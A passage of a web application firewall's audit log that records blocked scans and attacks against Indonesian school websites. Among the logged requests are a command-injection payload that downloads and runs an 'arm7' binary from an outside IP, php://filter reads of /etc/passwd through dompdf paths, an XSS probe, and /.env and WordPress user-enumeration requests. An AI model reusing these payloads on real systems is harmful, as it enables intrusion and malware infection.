REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748679165798119 3053 (- - -) Stopwatch2: 1748679165798119 3053; combined=1335, p1=445, p2=848, p3=0, p4=0, p5=42, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9a5f038-Z-- --c7c5f405-A-- [31/May/2025:15:13:06 +0700] aDq6Ep3Kgs4r2wz12c6knQAAAAE 103.236.140.4 47424 103.236.140.4 8181 --c7c5f405-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.16.33.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.16.33.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7c5f405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7c5f405-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748679186306665 2433 (- - -) Stopwatch2: 1748679186306665 2433; combined=1108, p1=342, p2=745, p3=0, p4=0, p5=21, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c5f405-Z-- --6559d947-A-- [31/May/2025:15:26:38 +0700] aDq9Ph_L2Rte6DjSjWZFoQAAAIY 103.236.140.4 35516 103.236.140.4 8181 --6559d947-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.171.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.171.7 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6559d947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6559d947-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748679998638287 734 (- - -) Stopwatch2: 1748679998638287 734; combined=303, p1=268, p2=0, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6559d947-Z-- --bad97847-A-- [31/May/2025:15:35:29 +0700] aDq_UR_L2Rte6DjSjWZHBgAAAJI 103.236.140.4 46494 103.236.140.4 8181 --bad97847-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --bad97847-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bad97847-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748680529024310 1004 (- - -) Stopwatch2: 1748680529024310 1004; combined=474, p1=434, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bad97847-Z-- --837c465e-A-- [31/May/2025:15:54:45 +0700] aDrD1eg1nD2n5twq7NteAAAAAFg 103.236.140.4 38348 103.236.140.4 8181 --837c465e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.200.53.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.200.53.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --837c465e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --837c465e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748681685993542 3043 (- - -) Stopwatch2: 1748681685993542 3043; combined=1378, p1=460, p2=880, p3=0, p4=0, p5=38, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837c465e-Z-- --5b5c983c-A-- [31/May/2025:16:07:04 +0700] aDrGuJ3Kgs4r2wz12c604QAAABA 103.236.140.4 51194 103.236.140.4 8181 --5b5c983c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 81.216.9.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 81.216.9.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5b5c983c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b5c983c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748682424741596 3248 (- - -) Stopwatch2: 1748682424741596 3248; combined=1442, p1=477, p2=928, p3=0, p4=0, p5=36, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b5c983c-Z-- --cc59fd43-A-- [31/May/2025:16:08:08 +0700] aDrG-B_L2Rte6DjSjWZPngAAAII 103.236.140.4 52456 103.236.140.4 8181 --cc59fd43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc59fd43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc59fd43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748682488468128 2246 (- - -) Stopwatch2: 1748682488468128 2246; combined=1306, p1=412, p2=867, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc59fd43-Z-- --7dc0dd44-A-- [31/May/2025:16:38:20 +0700] aDrODJ3Kgs4r2wz12c7G_wAAAAQ 103.236.140.4 35968 103.236.140.4 8181 --7dc0dd44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.87.128.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.87.128.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7dc0dd44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dc0dd44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748684300868961 2287 (- - -) Stopwatch2: 1748684300868961 2287; combined=1247, p1=409, p2=804, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dc0dd44-Z-- --1c89572e-A-- [31/May/2025:16:50:20 +0700] aDrQ3FbZTRMbIzLSWp7JBQAAAMY 103.236.140.4 34362 103.236.140.4 8181 --1c89572e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.58.93.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.58.93.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c89572e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c89572e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748685020099643 2941 (- - -) Stopwatch2: 1748685020099643 2941; combined=1367, p1=442, p2=895, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c89572e-Z-- --6d888d56-A-- [31/May/2025:17:41:42 +0700] aDrc5ug1nD2n5twq7NuKowAAAFI 103.236.140.4 50472 103.236.140.4 8181 --6d888d56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --6d888d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d888d56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748688102660399 823 (- - -) Stopwatch2: 1748688102660399 823; combined=346, p1=301, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d888d56-Z-- --c5bda327-A-- [31/May/2025:17:49:51 +0700] aDrez-g1nD2n5twq7NuM9wAAAEw 103.236.140.4 59504 103.236.140.4 8181 --c5bda327-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.93.95.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.93.95.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5bda327-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5bda327-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748688591901162 3438 (- - -) Stopwatch2: 1748688591901162 3438; combined=1831, p1=534, p2=1265, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5bda327-Z-- --74c69518-A-- [31/May/2025:18:02:36 +0700] aDrhzJ3Kgs4r2wz12c7o5gAAAAg 103.236.140.4 46620 103.236.140.4 8181 --74c69518-B-- GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 --74c69518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74c69518-E-- --74c69518-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689356500766 4352 (- - -) Stopwatch2: 1748689356500766 4352; combined=2306, p1=782, p2=1484, p3=0, p4=0, p5=40, sr=95, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74c69518-Z-- --f2f6fd26-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6AAAAAk 103.236.140.4 46650 103.236.140.4 8181 --f2f6fd26-B-- GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --f2f6fd26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f6fd26-E-- --f2f6fd26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458058 2852 (- - -) Stopwatch2: 1748689357458058 2852; combined=963, p1=677, p2=247, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f6fd26-Z-- --c5f18c08-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WgAAAI8 103.236.140.4 46656 103.236.140.4 8181 --c5f18c08-B-- GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c5f18c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5f18c08-E-- --c5f18c08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458564 2514 (- - -) Stopwatch2: 1748689357458564 2514; combined=801, p1=573, p2=188, p3=0, p4=0, p5=40, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5f18c08-Z-- --7a23f410-A-- [31/May/2025:18:02:37 +0700] aDrhzVbZTRMbIzLSWp7hGgAAANM 103.236.140.4 46652 103.236.140.4 8181 --7a23f410-B-- GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --7a23f410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a23f410-E-- --7a23f410-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458284 2949 (- - -) Stopwatch2: 1748689357458284 2949; combined=954, p1=529, p2=382, p3=0, p4=0, p5=43, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a23f410-Z-- --daddb327-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WQAAAJU 103.236.140.4 46654 103.236.140.4 8181 --daddb327-B-- GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --daddb327-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daddb327-E-- --daddb327-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748689357458306 3061 (- - -) Stopwatch2: 1748689357458306 3061; combined=786, p1=504, p2=243, p3=0, p4=0, p5=39, sr=94, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daddb327-Z-- --e34ce055-A-- [31/May/2025:18:02:37 +0700] aDrhzVbZTRMbIzLSWp7hGwAAAMc 103.236.140.4 46662 103.236.140.4 8181 --e34ce055-B-- GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15 Accept: */* Accept-Language: en --e34ce055-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34ce055-E-- --e34ce055-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357459492 2048 (- - -) Stopwatch2: 1748689357459492 2048; combined=541, p1=371, p2=126, p3=0, p4=0, p5=44, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
